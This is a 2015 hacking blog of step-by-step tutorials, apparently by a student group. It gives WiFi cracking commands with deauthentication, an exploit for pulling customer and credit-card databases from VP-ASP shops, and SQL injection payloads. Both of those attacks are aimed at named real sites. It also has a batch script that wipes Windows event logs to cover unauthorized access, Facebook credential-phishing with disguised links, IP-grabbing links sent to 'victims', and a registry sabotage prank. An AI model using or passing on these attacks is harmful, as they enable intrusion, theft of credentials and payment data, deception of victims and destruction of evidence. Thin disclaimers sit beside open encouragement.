Tuesday, 14 July 2015

How To Hack WAP or WPA2 WiFi Security Fully Explained

12:44 pm
As Compared to WEP WiFi Hacking as explained on our previous tutorial, WPA/WPA2 is quite difficult and time consuming because of its Security. Cracking the password sometimes depends on your luck and success is not guaranteed.

..:: How to launch a Dictionary Attack on WPA Handshake ::..

You might get lucky and your nearest WiFi password may be based on a common dictionary word or number sequence. In such a case, you may succeed with a dictionary attack.

Step 1: Enable monitor mode on wireless interface

#airmon-ng start wlan0

This will start the monitor mode.

Step 2: Take note of the nearest WiFi networks.

#airodump-ng mon0

Step 3: Take note of the channel of your target network, dump packets from that channel and save them to a local capture file.

#airodump-ng -c6 mon0 -w capture_file

Step 4: Wait for WPA handshake capture

At this point, you can use 'aireplay-ng' to de-authenticate an associated legitimate client from the network. The point is that as he/she will authenticate again shortly, we will capture the handshake without having to wait too long:

#aireplay-ng --deauth 0 -a <AP_MAC> -c <CLIENT_MAC> mon0

If you don't know the MAC of any associated client, simply 'broadcast' a 'deauth' to all clients:

#aireplay-ng --deauth 0 -a <AP_MAC> mon0

Step 5: After you grab a WPA handshake comes the hard part of brute forcing using a dictionary. Use 'aircrack-ng' for this:

#aircrack-ng capture_file-01.cap -w listfile.lst

Now say your prayers and hope the passphrase is present in the dictionary you choose.

You can also use online distributed WPA/WPA2 handshake cracking tool on this website:

Note that if the Access Point has WPS Enabled, it becomes easier to recover the WPA / WPA2 passphrase as there are only 11,000 possible combinations needed to brute force the WPS PIN due to an implementation flaw.

Another tool called 'Reaver' can be used for WPA cracking, if WPS is enabled.

Here's the sample use of reaver:

#reaver -i mon1 -a 94:D7:23:48:BE:78 -vv -c8

-i is for interface
-a "94.... " is the bssid of hotspot
-vv for verbose mode
-c to specify the channel

Disclaimer: This is for experimentation or authorized penetration testing purposes only.

Tutorial by : Pranshu

How To Hack WEP WiFi Security Fully Explained

11:48 am
Hello Friends, Today We are going to learn the methods to hack any WEP WiFi by cracking its Password.

WiFi Security mostly contains WEP, WPA or WPA2 Psk Security. Out of which WEP is the weakest and the easiest to hack while WPA and WPA2 contains advance Encryption Security. In this tutorial we will cover WEP Hacking.

Things Required -> Backtrack or Kali Linux

..:: WEP Cracking ::..

No doubt, WEP is the easiest to crack .Here's how to crack WEP:

Step 1 : First we need to start the Monitoring Mode. Many people may face the no interface issues while giving the command airmon-ng so check the solution here -> http://sh.st/cXO1I

#airmon-ng start wlan0

Notice that the monitor mode is enabled on mon1 on wlan0 ,take note of this. We will need this interface later on.

Step 2 : Now Start dumping data packets with airodump

#airodump-ng mon1

You'll see all the WiFi Channels available in your area. Here we see different security like WEP, WPA and WPA 2. So we are going to use WEP.

Also, it is important to note other information here as that will determine how easily you get into the WiFi: 
  • The BSSID is the MAC address of the WiFi Network. 
  • Pwr tells you about the signal strength. 
  • Beacon signals are sent by the hotspot to indicate its presence. 
  • Data is the actual packets that we are interested in. The more data packets we have, the more certain we are to crack the hotspot. 
  • CH tells you the channel being used by the hotspot.
So I use airodump to focus on dumping packets from this paricular BSSID and store them in a file:

#airodump-ng -w wap -c 8 --bssid 14:D6:4D:A6:F6:69 mon1

-w specifies the file to write to, -c specifies the channel and you know what --bssid is for

Now capturing packets starts, and we play the waiting game. Wait to collect enough packets before trying to crack the password. Usually, we wait till we grab around 20000 packets.

How long this takes depends on the traffic flow on that BSSID and your distance from the BSSID.

STEP 3 : If it is taking too long to grab required number of packets, then you can use something called aireplay:

#aireplay-ng -b 14:D6:4D:A6:F6:69 -h 00:11:22:33:44:55 mon1

-b option is to specify the bssid

-h is to specify your hardware address

aireplay-ng will start generating bogus traffic, so that you can grab enough data packets fast.

STEP 4 : Now that we have enough data packets (42445), we can start cracking the password.

#aircrack-ng wap-02.cap

This wap-02 cap file is the name of the file in which we are saving the captured packets:

Now you just need to wait for sometime and Aircrack-ng will give you the cracked password:

So as we can see, the password is 9212173318. It seems its someone's cell phone number. I traced its location and it's based in Delhi. A bad practice to use personal information as password.

Hope you all enjoyed the tutorial. Any queries comment below or visit us at https://www.facebook.com/kiithackers

Credits > Pranshu

Resolution Airmon-ng showing No Interface

10:35 am
Today we are going to show you all a solution for the most common Error people face while performing Airmon-ng i.e. there will be no interface as shown below :

So how to fix this issue?

Step 1 : Before starting Make sure that you have Internet connection on your Backtrack or Kali Linux machine.If you are using  VM then make sure your VM network adapter is Bridged with the Physical Network.

Step 2 : Next Click here : http://linuxwireless.org/download/compat-wireless-2.6/ and Download compat-wireless-2010-06-26-p.tar.bz2 file on your Backtrack or Kali Machine.

Step 3 : After downloading we have to extract the file since its in compressed form(*.tar).so to extract it Go to the path where you have saved that file and then give the command :

tar -jxvf compat-wireless-2010-06-26-p.tar.bz2

Step 4 : After extracting go to that folder that is created after extraction, and give the command > make unload and then make load (for loading the new interface) and now you will be able to see the interface.

Checkout the Video for more clarification :

Feel free to comment below your queries.

Friday, 5 June 2015

How to hack VP-ASP Shopping websites and get all the Database details

12:05 pm
Hello Friends, Today we are going to learn how to hack VP-ASP cart of a Shopping website and download all their Database details like Customer details, Credit card details, Product details etc.

So some basic idea before starting the Tutorial, 

What we are going to do here?

Firstly we will hack a shopadmin website then we will download the database file which will be in the form of *.mdb. This database file contains all the client details like credit card information and also login name and passwords.

How to do this ?

Note : This tutorial is tested on "VP-ASP Shopping Cart Version:5.00"

Step 1 : First thing to do is to find VP-ASP 5.00 Sites, to do this -> Go to Google.com -> Type "VP-ASP Shopping Cart 5.00"[ Without Quotes ] . See the image for reference 

Step 2 : In this tutorial, we are going to target www.surfstats.com You can also select your website which is having "shopdisplaycategories.asp","shopadmin.asp" at the end of the URL. Since SURFSTATS have "shopdisplaycategories.asp" at the end of URL, we will target this.

Now lets go to the Exploit,

The exploit is : diag_dbtest.asp

Step 3 : A page will appear containing xDatabase, xDBLocation, xEmail etc. See the image below.

Step 4 : The most important thing here is "xDatabase". Depending on the websites, xDatabase name will vary like for some websites it will be "shopping140 , shopping500 or shopping550"

For us  xDatabase=shopping500

so what we have to do, just add xDatabase name in the URL alongwith the extension *.mdb i.e. 
"http://www.surfstats.com/eCommerce/vpasp/shopping500.mdb" and ENTER -> It will download the database file into your local machine.

If in case the database file is not getting downloaded then

give the database location(XDBLocation) before the shopping*.mdb URL example : "http://www.victim.com/[Dblocation]/shopping500.mdb"

Step 5 : Download the *.mdb file and you should be able to open it with any mdb file viewer like Microsoft Office Access.

Inside the file you will be able to find credit card details information, if you are lucky enough you may get details of username and password of customers etc.

Step 6 : The Admin Login page is usually located here : http://www.victim.com/*/shopadmin.asp, for us its : 

If you are not able to find the admin Username and Password on the *.mdb file or if its incorrect then try to find admin login page and enter the default password like:

Username : admin   
Password : admin

Username : vpasp    
Password : vpasp

Hope you all will like the tutorial and help us to spread knowledge because its FREE. Share it!!

For any queries comment below.

Note: Hacking website is an illegal act, this is only a informational post and I am not responsible for any actions done to you after reading this tutorial. This post is for educational purposes only.

Sunday, 17 May 2015

How to make your SmartPhone work as Mouse and Keyboard

12:36 pm
Hello friends, today we will learn how to make our Smartphone work as a Mouse and Keyboard remotely. We can also perform the below activities through this :

1. You can Manage your System Drives
2. Play Music of System
3. Restart, Log off, Shutdown and Lock the System Remotely
4. Control Youtube, VLC media player etc.

Okay so lets begin, for performing this you will require :

Step 1 : Download the Unified Remote Server file from the link provided above and Install it.

Step 2 : While Installing it, remember to check the "Windows Firewall Exception". After Installing it, Double click on the icon of Unified Remote Server. It will look like this :

If you want to see what all things we can do remotely then check the Remotes tab.

Step 3 : Since now our Server is up we are ready to make a connection with the App. Download the "Unified Remote App" from the link provided above and install it on your Andriod/Windows Smartphone.

Step 4 : After installing the App, you will only be able to see a blank white screen. So just click on the Options button Beside Remote -> You will be able to see options like below :

Step 5 : Now click on Servers -> There is a "+" Symbol at the Top Left Cornor( What we are doing here is configuring the Connection between the application and Server manually) -> Next Give a Display Name ( for me it is KIIT Hackers) -> Host IP will be the IP of my machine( it can be LAN IP or your WAN IP both will work) -> To know the IP Click on the WAN Detected as show on the image :

Step 6 : Just give the IP shown above on the App Host IP and save it (Don't modify anything else).

Step 7 : That's it we are done and ready to work. Just go to the Remotes and select what you want to perform. Hope you all like the Tutz. Any queries comment below.

Wednesday, 29 April 2015

How to clear all the Event Logs with just a Click

9:27 am
Hello Friends, today we are going to learn how to clear all the event logs with a few clicks. Before that understand first what is Event logs and how can we view them.

What are Event Logs ?

According to Microsoft , Event logs are special files that record significant events on your computer, such as when a user logs on to the computer or when a program encounters an error. Whenever these types of events occur, Windows records the event in an event log that you can read by using Event Viewer.

How to View them ?

Go to Run Prompt ( WINDOWS +R ) -> Type "Eventvwr" -> Enter -> Now you will be able to see the event viewer console. This is the place where windows store all the event logs of your computer.

Now the main question is, what is the need of clearing all this logs ?

Whether you do some unauthorized access into a machine or run your own virus on the machine, everything is being recorded in the form of logs. So people can anytime go through this logs and can easily understand what might have happened during that time.
So there is a need of learning how to clear all the logs.

Steps to clear Event Logs :

Step 1 : Open Notepad and copy-paste the below text and save the file as "somename.bat".
@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo Event Logs have been cleared! ^<press any key^>
goto theEnd
echo clearing %1
wevtutil.exe cl %1
goto :eof
echo You must run this script as an Administrator!
echo ^<press any key^>

Step 2 : That's it we are done, Now right click on the "bat file" and do "Run as Administrator". When ever you click on the "bat" file it will clear the logs as shown in the image.



>_ Hope u all enjoyed today'z trick any doubt related to the code just message us in the comment.
Note : Microsoft doesn't recommend deleting of logs so always perform this only at extreme levels.

Monday, 23 February 2015

How to Find which USB devices were Plugged in your system

2:46 pm
Hello guyz, once again we are back with another interesting trick. Just Imagine, you are running a company where you have disabled the USB Access for your employees. But since there are many clever minded peoples,they will always try to connect some or the other USB devices.

So in this case, today we have are going to show you all a way to knw wat all USB Devices are plugged into a specific System.




STEP 1 : Press "WINDOWS + R" button to open Run prompt -> Type "regedit.exe" and Enter
STEP 2 : Now you are on the Registry window -> Expand HKEY_LOCAL_MACHINE -> SYSTEM -> CurrentControlSet -> Enum -> USBSTOR
STEP 3 : That's it done.. U can see the list of USB's devices connected on that system( Here we connected a Samsung mobile).


STEP 1 : Press "WINDOWS + R" button to open Run prompt -> Type "powershell" and Enter
STEP 2 : Now type the following command : Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Enum\USBSTOR\*\* | Select FriendlyName

Any queries comment below.

Thursday, 19 February 2015

Hacking Facebook or any Email Account using IP Tab napping Method

4:18 pm
Hi guyz, Today we r going to learn how to hack any Facebook or Email accounts using IP Tabnapping method. IP Tabnapping is similar to "Phishing technique" but here instead of using a web hosting site we will use own system IP address to get he email id and password. So for this you will require :

1. BackTrack OS ( We are using Backtrack5 R2 version, download it frm www.backtrack-linux.org)
2. Some social engineering tricks + Brain (most important thing)

okay so lets begin :

Step 1 : Open Backtrack, Click on Applications > BackTrack > Exploiting Tools > Social Engineering Tools > Social Engineering Toolkit > Set

Step 2 : Now u are in the set console, you can see several options there like Social Engineering attack, Fast track penetration testing etc. Just type 1 and press Enter . This will open "Social Engineering attack". 

Step 3 : Now another window will appear Just type "2" i.e. Website Attack Vectors .

Step 4 : Now another window will appear, Just type "3" i.e. Credential Harvester Attack Method.

Step 5 : Now u will get 3 options i.e. Web templates, Site cloner, Custom Import . Just type "2" i.e. Site Cloner

Step 6 : Now it will ask to input ur Ip address, to find out IP-Address in BackTrack, Open Terminal > Type "ifconfig" . You can view ur IP-Address there. Just check out the image below for more details. After getting the IP input it in SET & press Enter.

Step 7 : Now it will ask the URL to Clone. Here you type the URL u wanna hack like Facebook, gmail , yahoo, hotmail, twitter etc. We are using www.facebook.com . 

Step 8 : Just wait for some moments till the cloning is over. When the cloning is done u r ready to hack other.  

Just use ur brain to convince people to open ur IP-Adress (mentioned above) or u can also use URL shorteners or convert the IP in Hexadecimal form so that no one gets it. 

When they will open the ip address , they will get the page shown in the image and as they input the email id and password. it will be shown in ur SET.

That's it , this process is called IP Tabnapping. Hope u guyz will remember it next time. Phishing is also the same,no much difference except in phishing we have to copy the whole source to make a new facebook login page and just change the Action value to redirect it to our own page. 

Any query regarding this comment below.

How to Bypass SMS Verification send by any email Provider

3:38 pm

In most of the websites, it asks to enter your phone number for verification. Sometimes you don't want to give it because of your privacy reasons. Even when we register in websites like Gmail, Yahoo , hotmail, rediffmail etc. they asks for SMS Verification. So today we will learn how to bypass this SMS Verification method using external number.

For this method u can use the below mentioned website :

So how it works. This websites will provide you with some numbers . For example we are using http://receive-sms-online.com/ , In the below image u can see it is providing with some numbers. we will use this number to verify our account.

Now give any of this number where it asking for number and for the verification click on the Number u gave, and refresh the page. You will get your code as shown on the image below :

For any clarification do comment below.

CREDITS :- Amar Helloween & KIIT Hackers Team

How to find Someone's IP & Location details in just 1 mins

2:56 pm
Hello guyz, Today I'm gonna show you "How to find the IP address and Geographical Location of someone in just 1 minute", Easy and quick. This method is 100% working and accurate as tested by me so no useless comments!

So lets start :

Step 1 : Go to this website : http://www.whatstheirip.com/
Step 2 : Enter your mail id and click get link. See the image for details.

Step 3 : You'll see 2 links, Just copy either one of the link and send to your victim and make him open it, say "check out my new pic" or something like that (Don't open it by yourself).

Step 4 : Check your Inbox in the mail provided in step2. You'll see a mail with an IP address, You got his IP and Geo Location !!

When your Victim or Friend opens that link he'll see an error page and he'll think it as a random error.

Hope u guyz like this trick. Do comment if u have any problem in the above steps.

Credits :- Amar Helloween, Haxor Nitrox & KIIT Hackers

How to hack websites using Manual SQL injection

2:43 pm
Hello Friends, Today we are going to learn how to hack a website using Manual SQL injection.
The website which we will be using in this demo is : www.unitedpurpose.org/

So, here is the Vulnerable link : www.unitedpurpose.org/archive/article.php?id='100

So lets begin :

Step 1: First we have to find the number of columns present in the database. So to do that we have to implement the "order by" command in the vulnerable site. Example: 

http://www.unitedpurpose.org/archive/article.php?id=100 order by 7 (any no. u have to guess it, i m using 13 )

*Remember if u get error in "order by 7" that means site has less than 7 columns,if we get the same page then the no. of columns is more than 7.. In my case the number of columns are 13.

Step 2 : After getting the columns, its time to get the vulnerable column by using "UNION SELECT" no. of all columns 1 after another separated by commas(,). See the example for more clarification :

Example : http://www.unitedpurpose.org/archive/article.php?id=-100%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13--

Step 3 : In my case I got 4 and 7 as vulnerable column.(We will try with column 4). We can inject our queries in column 4 for version we can add @@version, for db database()

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,@@version,5,6,7,8,9,10,11,12,13-- (for getting the version)

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,database(),5,6,7,8,9,10,11,12,13-- (for getting the database)

Step 4 :  Now we hav got the version as well as database name, now its time to search for the table. For that we will replace the 4 with group_concat(table_name) and add from information_schema.tables where table_schema=database(). Example :

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()--

Step 5: Now it's time for getting the columns from the User tables,we need the mysql char for this. we will replace the table_name with column_name and from information_schema.tables where table_name=mysqlchar. Just search for user and pass. Example :

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13 from information_schema.columns where table_name=CHAR(109, 101, 109, 98, 101, 114, 115, 104, 105, 112)--

Step 6 : Final step to get the username and password from the column email and pass. we will remove everything from the information_schema and will add the (user,0x3a,newpass) from user's tables. Example. Just replace email and phone with ur admin and password. U will get the password in MD5 has just decrypt it.

http://www.unitedpurpose.org/archive/article.php?id=-100 UNION SELECT 1,2,3,group_concat(email,0x3a,phone),5,6,7,8,9,10,11,12,13 from membership--

# Any problem in understanding or execution do comment below.

Changing File formats of your Friends Machine

2:22 pm
Hello Guyz, today we are going to teach you a very simple but very dangerous trick which you can try out in your friends system :P

>_What are we going to do : We will change some of the important file formats like( exe, cpl, bat, msc, mp3 , mp4 , flv or any other of ur choice) into txt format.

>_ What will happen : Whenever ur friend will open any file with the above mentioned extensions for example suppose if they open any video file of format mp4 it will open as notepad and they will never be able to play that.

So lets get started :

Step 1 : We need to access ur victims/friends machine at least for 10 minutes.

Step 2 : Type regedit.exe (registry) in run prompt of the victims machine.

Step 3 : Now you are on the Registry window -> Click on "HKEY_CLASSES_ROOT" and search for the extension you want to change. Here we are changing any executable file (.exe) to text file(.txt). Similarly you can also change of you own.

Step 4 : Click on the file format(.exe) -> On the right side their is "Default" -> Right click Modify -> It might be written as exefile change it to txtfile,similarly if u r changing any mp3 file change mp3file to txtfile. -> Click on OK and we are done.

Step 5 : Now try to open any .exe file(Here I tried opening Snipping tool), it will open in text file(Notepad). Enjoy !!!


Since we converted .exe file to .txt file now our Regedit, command prompt any of the applications will not open. Gone case right :P

There are 2 ways to recover it back. 

(a) Create a batch file ( file with extenstion .bat) and write regedit.exe inside that file. Double click on it ur registy will open again now you can change the format.

(b) Second option you have is Opening MMC console. Type MMC on search and double click ur mmc console will open -> Now click on File -> ADD Snap-ins

Any doubts ask below in comments :

Credits :- Amar Helloween & KIIT Hackers Team

Contact us


Email *

Message *